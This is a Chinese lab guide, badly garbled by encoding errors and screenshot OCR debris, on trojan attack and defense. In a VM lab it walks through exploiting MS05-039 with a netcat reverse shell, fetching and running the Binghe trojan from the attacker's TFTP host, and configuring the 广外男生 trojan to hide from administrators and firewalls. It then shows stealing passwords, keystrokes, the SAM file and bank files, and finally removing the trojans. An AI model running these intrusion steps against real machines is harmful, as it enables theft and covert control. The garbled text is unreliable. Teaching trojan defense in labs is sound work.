1、實驗指導5木馬攻擊與防范實驗.實驗?zāi)康睦斫夂驼莆漳抉R傳播和運行的機制，掌握檢查和刪除木馬的技巧，學會防御木馬的相關(guān)知識，加深對木馬的安全防范意識。.預備知識木馬及木馬技術(shù)的介紹（1）木馬概念介紹很多人把木馬看得很神秘，其實，木馬就是在用戶不知道的情況下被植入用戶計算機，用來獲取用戶計算機上敏感信息（如用戶口令，個人隱私等）或使攻擊者可以遠程控制用戶主機的一個客戶服務(wù)程序。這種客戶/服務(wù)模式的原理是一臺主機提供服務(wù)（服務(wù)器），另一臺主機使用服務(wù)（客戶機）。作為服務(wù)器的主機一般會打開一個默認的端口并進行監(jiān)聽（Listen）,如果有客戶機向服務(wù)器的這一端口提出連接請求（ConnectRequest）

2、，服務(wù)器上的相應(yīng)守護進程就會自動運行，來應(yīng)答客戶機的請求。通常來說，被控制端相當于一臺服務(wù)器，控制端則相當于一臺客戶機，被控制端為控制端提供預定的服務(wù)。（2）木馬的反彈端口技術(shù)由于防火墻對于進入的鏈接往往會進行非常嚴格的過濾，但是對于連出的鏈接卻疏于防范。于是，與一般的木馬相反，反彈端口型木馬的服務(wù)端（被控制端）使用主動端口，客戶端（控制端）使用被動端口。木馬定時監(jiān)測控制端的存在，發(fā)現(xiàn)控制端上線立即彈出端口主動連結(jié)控制端打開的主動端口；為了隱蔽起見，控制端的被動端口一般開在80，這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似TCPUserIP:1026ControllerIP:8

3、0ESTABLISHED的情況，稍微疏忽一點，你就會以為是自己在瀏覽網(wǎng)頁。（3）線程插入技術(shù)木馬程序的攻擊性有了很大的加強，在進程隱藏方面，做了較大的改動，不再采用獨立的EXE可執(zhí)行文件形式，而是改為內(nèi)核嵌入方式、遠程線程插入技術(shù)、掛接PSAPI等。這樣木馬的攻擊性和隱藏性就大大增強了。木馬攻擊原理特洛伊木馬是一個程序，它駐留在目標計算機里，可以隨計算機自動啟動并在某一端口進行偵聽，在對接收的數(shù)據(jù)識別后，對目標計算機執(zhí)行特定的操作。木馬，其實質(zhì)就是一個通過端口進行通信的網(wǎng)絡(luò)客戶/服務(wù)程序。(1)基本概念網(wǎng)絡(luò)客戶/服務(wù)模式的原理是一臺主機提供服務(wù)(服務(wù)器)，另一臺主機接受服務(wù)(客戶機)。作為服務(wù)

4、器的主機一般會打開一個默認的端口并進行監(jiān)聽(Listen)如果有客戶機向服務(wù)器的這一端口提出連接請求(ConnectRequest)服務(wù)器上的相應(yīng)程序就會自動運行，來應(yīng)答客戶機的請求，這個程序稱為守護進程UNIX的術(shù)語，不過已經(jīng)被移植到修系統(tǒng)七。對于特洛伊木馬,被控制端就成為一臺服務(wù)器空制端則是一臺客戶成守護進程，G.client是客戶端應(yīng)用程序。(2)實現(xiàn)木馬的控制功能由于Win98開放了所有的權(quán)限給用戶，因此，以用戶權(quán)限運行的木馬程序幾乎可以控制一切，下面僅對木馬的主要功能進行簡單的概述，主要是使用WindowsAP函數(shù)。遠程監(jiān)控(控制對方鼠標、鍵盤，并監(jiān)視對方屏)幕keybd_even模

5、擬一個鍵盤動作。mouse_even模擬一次鼠標事件mouse_event(dwFlagdx,dy,eButtonsdwExtralnfo)dwFlags:MOUSEEVENTF_ABSOLU指定鼠標坐標系統(tǒng)中的一個絕對位置MOUSEEVENTF_MOV動鼠標MOUSEEVENTF_LEFTDO橫擬鼠標左鍵按下MOUSEEVENTF_LEFT嘿擬鼠標左鍵抬起MOUSEEVENTF_RIGHTDO橫擬鼠標右鍵按下MOUSEEVENTF_RIGHT膜擬鼠標右鍵按下dx,dy:MOUSEEVENTF_ABSOLl中的鼠標坐標。記錄各種口令信息keylogbegi：n將擊鍵記錄在一個文本文件里,同時還

6、記錄執(zhí)行輸入的窗口名。獲取系統(tǒng)信息a.取得計算機名GetComputerNameb.更改計算機名SetComputerNamec.當前用戶GetUserNamed.系統(tǒng)路徑e.取得系統(tǒng)版本f.當前顯示分辨率限制系統(tǒng)功能a.遠程關(guān)機或重啟計算機，使用WinAPI中的如下函數(shù)可以實現(xiàn)。ExitWindowsEx(UINTuFlags，DWORDdwReserved)當uFlags=EWX_LOGOFF中止進程，然后注銷=EWX_SHUTDOWN關(guān)掉系統(tǒng)但不關(guān)電源=EWX_REBOOT重新引導系統(tǒng)二EWX_FORCE強迫中止沒有響應(yīng)的進程=EWX_POWERDOWN關(guān)掉系統(tǒng)及關(guān)閉電源b.鎖定鼠標，C

7、lipCursor(lpRectAsRECT)可以將指針限制到指定區(qū)域，或者用ShowCursor(FALSE)把鼠標隱藏起來也可以，RECT是定義的一個矩形。c.讓對方掉線RasHangUpd.終止進程ExitProcesse.關(guān)閉窗口利用FindWindow函數(shù)找到窗口并利用SendMessage函數(shù)關(guān)閉窗口遠程文件操作刪除文件：Filedelete拷貝文件：Filecopy共享文件：Exportlist(列出當前共享的驅(qū)動器、目錄、權(quán)限及共享密碼)注冊表操作在VB中只要SetRegEdit=CreateObject()就可以使用以下的注冊表功能：刪除鍵值:RegKey增加鍵值:RegKe

8、y，RegValue獲取鍵值:(Value)木馬的防范建議A.不要隨意打開來歷不明的郵件現(xiàn)在許多木馬都是通過郵件來傳播的，當你收到來歷不明的郵件時，請不要打開，應(yīng)盡快刪除。并加強郵件監(jiān)控系統(tǒng)，拒收垃圾郵件。B.不要隨意下載來歷不明的軟件最好是在一些知名的網(wǎng)站下載軟件，不要下載和運行來歷不明的軟件。在安裝軟件的同時最好用殺毒軟件查看有沒有病毒，之后才進行安裝。C.及時修補漏洞和關(guān)閉可疑的端口一般木馬都是通過漏洞在系統(tǒng)上打開端口留下后門，以便上傳木馬文件和執(zhí)行代碼，在把漏洞修補上的同時，需要對端口進行檢查，把可疑的端口關(guān)閉。D.盡量少用共享文件夾如果必須使用共享文件夾，則最好設(shè)置帳號和密碼保護。注

9、意千萬不要將系統(tǒng)目錄設(shè)置成共享，最好將系統(tǒng)下默認共享的目錄關(guān)閉。Windows系統(tǒng)默認情況下將目錄設(shè)置成共享狀態(tài)，這是非常危險的。E.運行實時監(jiān)控程序在上網(wǎng)時最好運行反木馬實時監(jiān)控程序和個人防火墻，并定時對系統(tǒng)進行病毒檢查。F.經(jīng)常升級系統(tǒng)和更新病毒庫。3.實驗環(huán)境1）預備知識要求了解網(wǎng)絡(luò)的基本知識；熟練使用windows操作系統(tǒng)；充分理解木馬攻擊原理；熟悉緩沖溢出攻擊。2）下載和運行木馬軟件期間，請關(guān)閉殺毒軟件的自動防護功能以及防火墻,否則程序會被當作病毒而強行終止。運行環(huán)境1）需要下載的其它的工具軟件有：:tftp服務(wù)程序，用來傳輸“冰河”木馬服務(wù)端程序:緩沖溢出攻擊反向連接服務(wù)程序（參見

10、“緩沖區(qū)溢出攻擊與防范實驗”）;:緩沖溢出攻擊工具（參見“緩沖區(qū)溢出攻擊與防范實驗”）;冰河木馬.exe:冰河木馬程序；:“廣外男生”木馬程序。2）本實驗需要用到虛擬機，因此每臺實驗主機都通過安裝軟件WMwareWorkstation分割出虛擬機。真實主機P1的配置為：操作系統(tǒng)Windows2000server或者windowsxpsp2,并且安裝緩沖區(qū)溢出攻擊軟件，“冰河”木馬，“廣外男生”木馬。虛擬機P2配置為:操作系統(tǒng)Windows2000Server（沒有打補丁，存在ms05039漏洞，并且安裝了1衛(wèi)組件）。3）實驗環(huán)境拓撲如圖1所示：圖1實驗網(wǎng)絡(luò)拓撲圖請根據(jù)實驗環(huán)境將IP地址填入下表

11、，攻防實驗服務(wù)器IPP1:本機IPP2:本機上的虛擬機IPP3:表1實驗IP實驗中，可把真實機P2作為攻擊機，安裝上“冰河”木馬程序，和“廣外男生”；虛擬機P3作為被攻擊主機，安裝IIS組件。4.實驗內(nèi)容和步驟實驗任務(wù)一：“冰河”木馬本實驗需要把真實主機作為攻擊機，虛擬機作為靶機。即首先利用ms05039溢出工具入侵虛擬機，然后利用“冰河”木馬實現(xiàn)對虛擬機的完全控制。最后對木馬進行查殺。A.“冰河”使用：冰河是一個基于TCP/IP協(xié)議和Windows操作系統(tǒng)的網(wǎng)絡(luò)工具，所以首先應(yīng)確保該協(xié)議已被安裝且網(wǎng)絡(luò)連接無誤，然后配置服務(wù)器程序（如果不進行配置則取默認設(shè)置），并在欲監(jiān)控的計算機上運行服務(wù)器端

12、監(jiān)控程序即可。主要文件包括：a.:被監(jiān)控端后臺監(jiān)控程序（運行一次即自動安裝，可任意改名），在安裝前可以先通過G_Client”的配置本地服務(wù)器程序功能進行一些特殊配置，例如是否將動態(tài)IP發(fā)送到指定信箱、改變監(jiān)聽端口、設(shè)置訪問口令等）；b.:監(jiān)控端執(zhí)行程序，用于監(jiān)控遠程計算機和配置服務(wù)器程序。具體功能操作包括：a.添加主機：將被監(jiān)控IP地址添加至主機列表，同時設(shè)置好訪問口令及端口，設(shè)置將保存在文件中，以后不必重輸。如果需要修改設(shè)置，可以重新添加該主機，或在主界面工具欄內(nèi)重新輸入訪問口令及端口并保存設(shè)置。b.刪除主機：將被監(jiān)控端IP地址從主機列表中刪除。自動搜索：搜索指定子網(wǎng)內(nèi)安裝有冰河的計算機。

13、查看屏幕：查看被監(jiān)控端屏幕。屏幕控制：遠程模擬鼠標及鍵盤輸入。“冰河”信使：點對點聊天室。修改遠程配置：在線修改訪問口令，監(jiān)聽端口等服務(wù)器程序設(shè)置，不需要重新上傳整個文件，修改后立即生效。B.在對“冰河”有所了解之后，我們進入攻防實驗階段一一使用“冰河”對目標計算機進行控制：在目標主機（虛擬機）上植入木馬，即在此主機上運行G_Sever，作為服務(wù)器端；在攻擊機上運行G_Client，作為控制端。分別運行這兩個.exe文件后，我們進入控制端主界面，按照以下步驟來實現(xiàn)對目標主機的控制。步驟1：入侵準備工作1）下載和安裝木馬軟件前，關(guān)閉殺毒軟件的自動防護功能，避免程序會被當作病毒而強行終止。2）運行

14、，如圖2；女伴舊特輯舊還置回幫眈W女伴舊特輯舊還置回幫眈W當前朝：而礪/ZI謝口：丁訪問口號（_j文件首電器電曲等控制臺|二I*河VU_4NEWFUN皆用J圖2“冰河”運行主界面3）選擇菜單“設(shè)置”-“配置服務(wù)程序”，如圖3；圖3設(shè)置木馬服務(wù)4）設(shè)置訪問口令為“1234567”，其它為默認值，點擊“確定”生成木馬的服務(wù)端程序。5）將生成的木馬服務(wù)程序拷貝到tftp服務(wù)的目錄即C:攻防tftp32,如圖4。后退-魚I微矍索|a文件夾曾|嗡電x堂|國，Ktlt（D）叵匚:攻防忡p32文件夾X的桌面-文件夾X的桌面-且我的電腦+$3,5軟盤3：-，本地橙盤仁)DocumenzsandSettirFO

15、UND.LOUProgramFilestmp1AlNNT攻防二l-Jf七L口tftp32選定項目可以查看三說明.另請參閱：我的文檔網(wǎng)上鄰居我的電腦叵|於G_5erver.exetftpd32,exetftp32_J冰河+_J本地催盤tftp32_J冰河+_J本地催盤(D),.11.圖4將拷貝到目錄5攻防tftp326）運行，務(wù)程序。如圖5。保持此程序一直開啟，用于等待攻擊成功后傳輸木馬服圖5tftp服務(wù)運行步驟2：進行攻擊，將木馬放置在被攻擊端1）對靶機P3進行攻擊，首先運行nc-vv-l-p99接著再開一個dos窗口，運行ms05039991（注意：此次IP地址請根據(jù)實際IP地址修改）2）攻

16、擊成功后，在運行nc-vv-l-p99的dos窗口中出現(xiàn)如圖6提示，若攻擊不成功請參照“緩沖區(qū)溢出攻擊與防范實驗”，再次進行攻擊。CsIND0S33FiSi：B32kcd.cse-nc-w-1-d99UindLnusKFT5-1.2600版權(quán)Et有19B52001MicrosoftGurpBC：%J)ocumcnitsandScttingsMuablc.liicdC=onsffanarCsgorincvu1p99listenino1onLa.1151J9號HHHCDnnectfpninC0hmH0R-76.fiiC96C192_168_3,15011B32MlcpnanftUindLaus20

17、0rUeFslnm5_2iS53版權(quán)所有1T85-200BMicrosoftCofd.C：HHTSsy即n32.圖6攻擊成功示意3）在此窗口中運行tftp-iget將木馬服務(wù)程序上傳到靶機P3上，并直接輸入使之運行，如圖7。圖7上載木馬程序并運行步驟3：運行木馬客戶程序控制遠程主機1）打開程序端程序，單擊快捷工具欄中的“添加主機”按扭，如圖8所示。“顯示名稱”：填入顯示在主界面的名稱“target“主機地址”：填入服務(wù)器端主機的IP地址20.23”。“訪問口令”：填入每次訪問主機的密碼，這里輸入“1234567”。“監(jiān)聽端口”：“冰河”默認的監(jiān)聽端口是7626,控制端可以修改它以繞過防火墻。圖

18、8添加主機單擊“確定”按扭，即可以看到主機面上添加了主機，如圖16。圖9添加主機后主界面這時我們就可以像操作自己的電腦一樣操作遠程目標電腦，比如打開C:WINNTsystem32config目錄可以找到對方主機上保存用戶口令的SAM文件。點擊鼠標右鍵，可以發(fā)現(xiàn)有上傳和下載功能。即可以隨意將虛擬機器上的機密文件下載到本機上，也可以把惡意文件上傳到該虛擬機上并運行。可見，其破壞性是巨大的。2)“文件管理器”使用。點擊各個驅(qū)動器或者文件夾前面的展開符號，可以瀏覽目標主機內(nèi)容。如圖17所示，通過瀏覽可以發(fā)現(xiàn)目標主機的敏感信息，如“銀行賬號”等。二口2s.文件口編輯匡15HEG幫助國,孰圈里|Q|回量君

19、|。修當前連接：“七ZJ淌=i：運二訪向口令：|*|應(yīng)用叵acnbdok餛行貼號文件名稱口.狗工仔塊七包建行tKt二口國后做施施磁幼后圖acnbdok餛行貼號文件名稱口.狗工仔塊七包建行tKt二口國后做施施磁幼后圖磁包磁G:Itl-Fl-E.,E-!凹，0-EFFlFl-E-K-:凹！凹；.：E田支件大小與節(jié))最后更撕時間9S200G-G-2312:03:5640200日-日-231?050hacknrnunashiyzTi即百KECYCLER銜回逾立年周交流鎖定泵統(tǒng)無或網(wǎng)絡(luò)安嚏學習瞟件2個對象.圖9瀏覽至敏感信息然后選中文件，在右鍵菜單中選中“下載文件至.”，在彈出的對話框中選好本地存儲路徑

20、，點擊“保存”。下載成功是界面如圖10。文怦編強舊諼置段幫助田當箭連搔：七文怦編強舊諼置段幫助田當箭連搔：七3七，端口：rszB訪同口令：*仙*應(yīng)用匡日文伴管理器也命令控制告ILEUlCLER廚儡闞口徐徐酶陶000ILEUlCLER廚儡闞口徐徐酶陶000國陶今0曲，.尹旺.0-,4!尹日0-,旺；旺.尹0-0-;.4巴日&：gII國一文件傳送完畢7圖10成功下載文件后界面2)“命令控制臺”使用。單擊“命令控制臺”的標簽，彈出命令控制臺界面，如圖11，驗證控制的各種命令。口等英命令當前連接：.j文件莒理器%口等英命令當前連接：.j文件莒理器%命令控制吉建制二的作網(wǎng)絡(luò)第命令文件類飾除注冊賽法寫諛匿

21、手前吟詰從左則列表中選擇相關(guān)能等圖11命令控制臺a.口令類命令：展開“口令類命令”，如圖12當前連接：七江3士|文件營理錨電命雷控制臺Q口令類由金泵統(tǒng)信息及口令歷史口令擊槌記錄拴判匪出臺當前連接：七江3士|文件營理錨電命雷控制臺Q口令類由金泵統(tǒng)信息及口令歷史口令擊槌記錄拴判匪出臺網(wǎng)絡(luò)類命令文件類布令fiQ,注冊表讀寫十片L設(shè)置類命令;I6壬應(yīng)計牛.i內(nèi)布受克C:蔭如日.器IW【目目機僉用用內(nèi)向宛高任,!，魂對苴lln冊前任項面面ID.II:錄戶戶-fr存度度PniijdWindowsSTC加:EHTlc/-.imirrkEYEtQms1.C:匚口叫八虹懵BI、1.COM.LO匚ALSNLTmf

22、%COMN01DR-766C90A-Iministrator2GTH211HMB4O4S0KEZJJ前SIM.lS97.23O015：i44M440.EBBL3ZB1Z5W開機口等繳存口令其它口令數(shù)據(jù)沅報收完畢.圖12口令類命令“系統(tǒng)信息及口令”可以查看遠程主機的系統(tǒng)信息，開機口令，緩存口令等。“歷史口令”可以查看遠程主機以往使用的口令。“擊鍵記錄”可以記錄遠程主機用戶擊鍵記錄，以次可以分析出遠程主機的各種帳號和口令或各種秘密信息。b.控制類命令：展開“控制類命令”，如圖13。當前這按：，皓口：當前這按：，皓口：T626訪問口令：厘用見_3文件管理器電命等控劉告C1口令類命令-0控制類命令捕獲

23、屏幕發(fā)送情思i進程首理,窗口管理本統(tǒng)控制鼠標控制.11:.11:田；因.由屏后控制0b網(wǎng)絡(luò)類命令【三文性類命令C1注冊表讀寫口1誑查類命全屏后控制捕獲區(qū)域：全屏色海口一口二nn：傳輸格式：|enf三品質(zhì)口-10口：15圖13控制類命令“捕獲屏幕”可以使控制端使用者查看遠程主機的屏幕。“發(fā)送信息”可以向遠程計算機發(fā)送Windows標準的各種信息。“進程管理”可以使控制者查看遠程主機上所有的進程，如圖14。單擊“查看進程”按鈕，就可以看到遠程主機上存在的進程，甚至還可以終止某個進程，只要選中相應(yīng)的進程，然后單擊“終止進程”就可以了。A,I口令英前會IzIt控制莞命等,捕乘屏耳A,I口令英前會IzI

24、t控制莞命等,捕乘屏耳發(fā)送信息9進程后理吉口言理率藐控制,鼠標控制,其它控制同降莞前生當前連拉：卜皿,七二口揣口：眄函一訪問口令：阿否匚應(yīng)用國臺文件管理器與命令拄制白Sys-aiplrSysF.d4rSysFtderletDBEVinddwsWindowsCSCJ(otificb.fiqtis.hindjou出遍去.CorifL4cti4RS7r4YHIEServerWindow3YSFEMAJGEHTEHfiIJiTOlYHIMNotifyCallbtckFIEk亡buhwoHI4niior銀行以MFrogrsitiFJandgor由：田：田：田耀止進程數(shù)一流扭收完畢_二圖14遠程主機進程控

25、制“窗口管理”可以使遠程主機上的窗口進行刷新，最大化，最小化，激活，隱藏等。“系統(tǒng)管理”可以使遠程主機進行關(guān)機，重啟，重新加載“冰河”，自動卸載“冰河”的操作。“鼠標控制”可以使遠程主機上的鼠標鎖定在某個范圍內(nèi)。“其他控制”可以使遠程主機上進行自動撥號禁止，桌面隱藏，注冊表鎖定等操作。c網(wǎng)絡(luò)類命令展開“網(wǎng)絡(luò)類命令”，如圖15:“創(chuàng)建共享”在遠程主機上創(chuàng)建自己的共享。“刪除共享”在遠程主機上刪除某個特定的共享。“網(wǎng)絡(luò)信息”可以看到遠程主機上的IPC$，C$，人口忖小$等共享。d文件類命令：展開“文件類命令”，文件瀏覽，“文件查找”，“文件壓縮”,“文件刪除”，“文件打開”等。e注冊表讀寫：展開“

26、注冊表讀寫”f設(shè)置類命令：展開“設(shè)置類命令”圖15網(wǎng)絡(luò)命令步驟4：刪除“冰河”木馬刪除“冰河”木馬的方法：A.客戶端的自動卸載功能，在“控制命令類”中的“系統(tǒng)控制”里面就有自動卸載功能，執(zhí)行這個功能，遠程主機上的木馬就自動卸載了。B.手動卸載，查看注冊表，打開windows注冊編輯器。打開HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun如圖16。在目錄中發(fā)現(xiàn)了一個默認的鍵值C:WINNTSystem32,這就是“冰河”木馬在注冊表中加入的鍵值，將它刪除。打開HKEY_LOCAL_MACHINESOFTWAREMicrosof

27、tWindowsCurrentVesionRunservices,如圖17。在目錄中也發(fā)現(xiàn)了一個默認的鍵值C:WINNTSystem32,這也是“冰河”在注冊表中加入的鍵值，將它刪除。上面兩個注冊表的子鍵目錄Run和Runservices中存放的鍵值是系統(tǒng)啟動時自啟動的程序，一般病毒程序，木馬程序，后門程序等都放在這些子鍵目錄下，所以要經(jīng)常檢查這些目錄下的程序。圖16注冊表編輯-l-n-r-n-nmu-n-n-r-l回回：廠爭辦r曲：L;廠甲由；廠甲辦：廠甲,廠廠廠甲廠品由分，：甲甲GroupPolicyH323T5PnstalernternetSektngsntlRjunLntlRun-l-

28、n-r-n-nmu-n-n-r-l回回：廠爭辦r曲：L;廠甲由；廠甲辦：廠甲,廠廠廠甲廠品由分，：甲甲GroupPolicyH323T5PnstalernternetSektngsntlRjunLntlRun,口匚PLcrFMSPPCcnFT5PM8ModuteUsacpM5-DC6ErnulabDnNetCchepliersREli.=bifitvRunRunGTCBRunOrceERjunServfcesSetupSharadDLLsLFLTW力氏鼠5kll我的電腦1HKE5nager32h.eceSyDcniar圖17注冊表編輯然后再進入C:WINNTSystem32目錄，找到“冰河”的

29、兩個可執(zhí)行文件和文件，將它們刪除，如圖18。文件編輯但查看的收藏（由工具幫助CW文件編輯但查看的收藏（由工具幫助CW仁后退一,回I四搜索I芻文件夾|四喏X筋|國地址（9|Isystems2文件夾-十十本地磁盅（C。Document?and5ettlrLJiProgramFlies臣WINNTaddinsAppPatch文件夾-十十本地磁盅（C。Document?and5ettlrLJiProgramFlies臣WINNTaddinsAppPatchassemblyConfigConnectionWizarCurscrsDebugDownloadedInst-：DoAnluadedProgDri

30、verCache!田：選定Z個對象蛆es.dll回mpg4d32.次喻raemuntr.dllvwow：32jdll布COMDLG3?.DLL/msjtes4O.dll/cscui.dll嘮qmgr.dll可M5FLXGR.D.OCK至|lcnri3Z.dll但localsec.dl嘮5trmdll.dll至|msie HYPERLINK Ftp.dll司inetcfg.dllM5RD2X35,DLL5Z0KB望sizesrvjzlll司rriE-.-crt2U.dllh323.tspwebchtackudll司rri5h263.dr-,竺rristesH-O.dll司|WINSR1-7.DL

31、L言LOCAL5PL.DLL聞sortkey.nIs啕QTFhjglri.uizx啕P15DATGRD.OC；：啕d:：rnrtp.dllddraAi.dllddeF2dnrvE/M-I5err1.Id口qpwhVprlLr-ll-prllzvk包回包回包包包包*包包型包且我的電腦圖18刪除木馬程序修改文件關(guān)聯(lián)也是木馬常用的手段，“冰河”將txt文件的缺省打開方式由改為木馬的啟動程序，除此之外，html,exe，zip，com等都是木馬的目標。所以，最后還需要恢復注冊表中的txt文件關(guān)聯(lián)功能，只要將注冊表中的HKEY_CLASSES_ROOTtxtfileshellopencommand下的默

32、認值，改為C:Windows%1，即可，如圖19。這樣，再次重啟計算機我們就完全刪除了“冰河”木馬。C.殺毒軟件查殺大部分殺毒軟件都有查殺木馬的功能，可以通過這個功能對主機進行全面掃描來去除木馬，就徹底把木馬文件刪除了。htfle口AdUo：fiiihl由htfle口AdUo：fiiihl由匚J日犯郵違T,.jjrtswThS-gl中里F*m口力叫1忖閨on非圖i映出白掰%dE工三二本次和的命jH#：q!E帝iWd?口口口口口自口口口口口自s口口口口呂q日THExim&4.fdLpTA.Llut.GUiTksLM聞黯r_Bt.F*dEngiTn_ec固國飄5rM61Tn_Bh%l/AckaQ*

33、injstk腎聲dWgL11聞JluPUrrTlLSt加罩gi跛由拈I百萌f1r_Bt.、*d*tfuir.LIS囪bHTSHtK.T.TSH&jRb-I.L13lrt3ffnpaT：fiTOfrMnlwnpTiLTSLV.1SLY15LV.13-V.LMisttfHaCTx.T”歷士魚匚Ci咕5眈圖19去除關(guān)聯(lián)實驗任務(wù)二：“廣外男生”木馬本實驗將真實機作為攻擊機，虛擬機作為靶機。真實機利用“廣外男生”木馬對虛擬機進行攻擊，最終完全取得虛擬機的控制權(quán)。最后學習木馬的查殺。1）“廣外男生”的連接運行，打開“廣外男生”的主程序，主界面如圖20。圖20“廣外男生”主界面進行客戶端設(shè)置。依次單擊“設(shè)置

34、”“客戶端設(shè)置”，彈出客戶端設(shè)置界面如圖21。我們可以看到它采用“反彈窗口線程插入技術(shù)”的提示。在“客戶端最大連接數(shù)”中填入允許多少臺客戶端主機來控制服務(wù)器端，注意不要太多，否則容易造成服務(wù)器端主機死機。在“客戶端使用端口”填入服務(wù)器端連接到客戶端的那個端口，這是迷惑遠程服務(wù)器端主機管理員和防火墻的關(guān)鍵，填入一些常用端口，會使遠程主機管理員和防火墻誤以為連接的是個合法的程序。比如使用端口80（此例中，為避免端口沖突，我們使用1500端口）。選擇“只允許以上地址連接”選項，使客戶端主機IP地址處于默認的合法控制IP地址池中。圖21客戶端設(shè)置程序（2）設(shè)置木馬的連接類型，如果使用反彈端口方式二則在

35、彈出對話框中選中“使用HTTP網(wǎng)頁IP通知”如果使用反彈端口方式一，則選擇“客戶處于靜態(tài)IP（固定IP地址）”，如圖22。此處我們選擇后者。單擊“下一步”，和“完成”，結(jié)束客戶端設(shè)置。圖22木馬連接類型設(shè)置（4）進行服務(wù)器端設(shè)置。依次單擊“設(shè)置”“生成服務(wù)器端”，這時彈出“廣外男生”服務(wù)器端生成向?qū)В苯訂螕簟跋乱徊健保瑥棾龀Ｒ?guī)設(shè)置界面，如圖23。圖23服務(wù)器端設(shè)置在“EXE文件名”和“DLL文件名”中填入加載到遠程主機系統(tǒng)目錄下的可執(zhí)行文件和動態(tài)鏈接庫文件，在“注冊表項目”中填入加載到遠程主機注冊表中的Run目錄下的鍵值名。這些文件名都是相當重要的，因為這是迷惑遠程主機管理員的關(guān)鍵所在，如果

36、文件名起的非常隱蔽，如，那么就算管理員發(fā)現(xiàn)了這些文件也不肯定這些文件就是木馬而輕易刪除。注意：把“服務(wù)器端運行時顯示運行標志并允許對方退出”前面的對勾去掉，否則服務(wù)器端主機的管理員就可以輕易發(fā)現(xiàn)自己被控制了。（5）進行網(wǎng)絡(luò)設(shè)置，如圖24選擇“靜態(tài)IP”，在“客戶端IP地址”中填入入侵者的靜態(tài)IP地址（即真實機IP），“客戶端用端口”填入在客戶端設(shè)置中選則的連接端口。圖24網(wǎng)絡(luò)設(shè)置（6）生成代理文件，在“目標文件”中填入所生成服務(wù)器端程序的存放位置，如E:gwboy092A,這個文件就是需要植入遠程主機的木馬文件。單擊“完成”即可完成服務(wù)器端程序的設(shè)置，這時就生成了一個文件名為的可執(zhí)行文件，如圖

37、25，并將該文件拷貝到虛擬機桌面上圖25生成代理文件（7）進行客戶端與服務(wù)器連接。在虛擬機上執(zhí)行木馬程序，等待一段時間后客戶端主機“廣外男生”顯示連接成功，如圖26。這時，就可以和使用第2代木馬“冰河”一樣控制遠程主機，主要的控制選項有“文件共享”，“遠程注冊表”，“進程與服務(wù)”，“遠程桌面”等。1&S黑于電）文件信息1&S黑于電）文件信息圖26客戶端與服務(wù)器連接成功2）命令行下“廣外男生”的檢測（1）由于使用了“線程插入技術(shù)”，所以在windows系統(tǒng)中采用任務(wù)管理器查看線程是發(fā)現(xiàn)不了木馬的蹤跡的，只能看到一些正常的線程在運行，所以需要用到另外兩個工具：fport和tlist。fport是第

38、三方提供的一個工具，可以查看某個具體的端口被哪個進程所占用，并能查看PIDtlist是windows資源工具箱中提供的工具，功能非常強大，我們利用它查看進程中有哪些動態(tài)鏈接庫正在運行，這對于檢測插入在某個正常進程中的線程是非常有用的。【問題2】：什么是“線程插入技術(shù)”（2）在服務(wù)器端主機（虛擬機）上依次單擊“開始”一“運行”輸入cmd,進入命令行提示符，在這里輸入口0$土-an，查看網(wǎng)絡(luò)端口占用狀態(tài)，如圖27。在顯示結(jié)果中，發(fā)現(xiàn)可疑IP地址（就是客戶端IP地址）與本機建立了連接，這是我們需要注意的地方，記住本機用于連接的端口號1231，1232，1233，1234。F：netstat-anAc

39、tiueConnectionsProtoTCPTCPTCPTCPTCPTCPTCPTCPTCPLocalAddressForeignAddressB_H_I3.B_S_0.00.0u.：ProtoTCPTCPTCPTCPTCPTCPTCPTCPTCPLocalAddressForeignAddressB_H_I3.B_S_0.00.0u.：135:445:1025：ises：1S8151082S1B8350=139192.1G8.3.150=1390.B_s.ia：s0a0.0.0：00a0_0.0：:0:0:0192.Its,3.163=1342StateLISTENINGLISTENING

40、L1STEM1NGLISTENINGLISTENINGLISTENINCLISTENINGLISTENINGESTflDLISHEDUDPUDPUDPIIDFUDPUDPUDPUDPUDPIIDFUDPUDPTCP192.160.：3.i5e：ieee192.16B.3.163:1500ESTABLISHTer192.1G8.：3.502108163:1500ESTALISHTer192.1G8.：3.50510823-150=1083192.1G8.3.163=1500ESTALISHLISHTCP192.168.：63;1500ESTA0.0.0,0;13:44:1026192,168,3

41、.150:137192,168,3.150:13850=50B圖27命令行下鍵入netstatan命令（3）接著在提示符下輸入fport（注意，要在有的目錄中運行fport）,在顯示結(jié)果中找到以上端口號，發(fā)現(xiàn)木馬插入的進程是，記住此進程的PID號728,如圖28。1_325-2195.6692shUSP1GI_DLL408suchost8Systcn8408suchost8Systcn8Sijstein卻串七211224lease212sewIces：578503334011145C-XWINNTXsysten32Xsunhost.exeUDPUDPUDPC=INNT5F3tcnt32Sis.cxeC二WINNTsyst